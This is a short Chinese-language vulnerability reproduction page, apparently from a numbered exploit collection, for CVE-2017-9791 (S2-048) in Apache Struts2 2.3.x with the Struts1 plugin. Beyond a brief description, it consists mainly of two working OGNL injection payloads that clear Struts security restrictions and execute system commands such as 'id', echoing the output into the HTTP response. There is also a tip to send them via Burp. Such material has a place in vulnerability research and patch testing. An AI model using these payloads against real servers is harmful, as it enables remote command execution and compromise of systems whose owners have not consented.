023-(CVE-2017-9791)s2-048

# (CVE-2017-9791)s2-048

## 一、漏洞简介

当实用了Struts2 Struts1 插件时,可能导致不受信任的输入传入到ActionMessage类种导致命令执行

## 二、漏洞影响

2.3.x

## 三、复现过程

## POC

![1.png](/static/lingzu/images/4dd1c2e7539c43ee8d37e710cbc54c35.png)

![2.png](/static/lingzu/images/237c6c9d04cc4743ae845f0228764df7.png)

**回显 在正常页面里**

“`java
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream())).(#q)}

“`

![3.png](/static/lingzu/images/bdaa75d563164093b75e1507a0bfd8a6.png)



burp里改 浏览器里填就500

**光有回显**

“`java
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’id’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

“`

![4.png](/static/lingzu/images/4d0082833dbd4b41abfd2d06fc8ec50e.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容